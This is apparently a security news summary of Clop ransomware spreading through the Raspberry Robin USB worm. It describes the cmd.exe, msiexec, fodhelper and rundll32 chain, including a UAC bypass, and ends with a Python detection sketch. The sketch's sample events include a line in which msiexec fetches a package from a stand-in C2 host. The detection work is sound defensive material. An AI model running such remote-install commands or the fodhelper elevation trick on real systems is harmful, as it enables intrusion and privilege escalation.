According to researchers at Microsoft, they have seen an uptick in Clop ransomware infections. The group has switched tactics and now uses Raspberry Robin as its main form of infection, whereas previously it relied on phishing campaigns to steal credentials and gain access to organizations. Raspberry Robin is a Windows worm that propagates through removable USB drives. The malicious code uses Windows Installer to reach out to QNAP-associated domains and download a malicious DLL, and it uses TOR exit nodes as a backup C2 infrastructure. The malware uses cmd.exe to read and execute a file stored on the infected external drive, then leverages msiexec.exe for external network communication to a rogue domain used as C2, downloading and installing a DLL library file. msiexec.exe then launches a legitimate Windows utility, fodhelper.exe, which runs rundll32.exe to execute a malicious command. The researchers pointed out that processes launched by fodhelper.exe run with administrative privileges and require no User Account Control (UAC) prompt.
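A detection sketch for the process chain just described, added here as an illustration (it is not from Microsoft's report or any product): three rules run over constructed Sysmon-style process-creation events, one per stage of the chain. The drive letters treated as removable, the sample paths and the domain are all assumptions.

```python
import re

# Constructed sample process-creation events modelled on Sysmon Event ID 1
# fields (ParentImage, Image, CommandLine). All values are made up for the demo.
SAMPLE_EVENTS = [
    ("explorer.exe", "cmd.exe", r"cmd.exe /c E:\update.cmd"),
    ("cmd.exe", "msiexec.exe", "msiexec.exe /q /i http://c2.example.test/pkg"),
    ("msiexec.exe", "fodhelper.exe", "fodhelper.exe"),
    ("fodhelper.exe", "rundll32.exe", "rundll32.exe C:\\ProgramData\\x.dll,Run"),
    ("explorer.exe", "msiexec.exe", r"msiexec.exe /i C:\Users\bob\setup.msi"),
    ("services.exe", "rundll32.exe", "rundll32.exe shell32.dll,Control_RunDLL"),
]

# Windows Installer told to fetch its package over HTTP(S) rather than from disk
REMOTE_MSI = re.compile(r"msiexec(\.exe)?\s.*\bhttps?://", re.IGNORECASE)

CHAIN_RULES = {"cmd_from_removable", "msiexec_remote_package", "fodhelper_rundll32"}


def detect_chain(events, removable_letters="DE"):
    """Return (rule, event_index) hits. removable_letters is an assumption:
    on a real host the set of removable volumes comes from an inventory
    source, not from the process event itself."""
    # Match a drive letter from the removable set followed by ':\'
    removable = re.compile(r"\b[" + removable_letters + r"]:\\", re.IGNORECASE)
    hits = []
    for i, (parent, image, cmdline) in enumerate(events):
        parent, image = parent.lower(), image.lower()
        # Stage 1: cmd.exe executing a file that lives on the removable drive
        if image == "cmd.exe" and removable.search(cmdline):
            hits.append(("cmd_from_removable", i))
        # Stage 2: msiexec.exe pulling an installer package from a remote host
        if image == "msiexec.exe" and REMOTE_MSI.search(cmdline):
            hits.append(("msiexec_remote_package", i))
        # Stage 3: auto-elevated fodhelper.exe spawning rundll32.exe (no UAC prompt)
        if parent == "fodhelper.exe" and image == "rundll32.exe":
            hits.append(("fodhelper_rundll32", i))
    return hits


def chain_complete(hits):
    """True when every stage of the described chain was observed on the host."""
    return CHAIN_RULES <= {rule for rule, _ in hits}


if __name__ == "__main__":
    found = detect_chain(SAMPLE_EVENTS)
    for rule, idx in found:
        print(f"{rule}: {SAMPLE_EVENTS[idx]}")
    print("full chain seen:", chain_complete(found))
```

Any single rule alone is noisy (msiexec with a URL is used by some legitimate deployment tools); the value is in correlating the stages on one host within a short window.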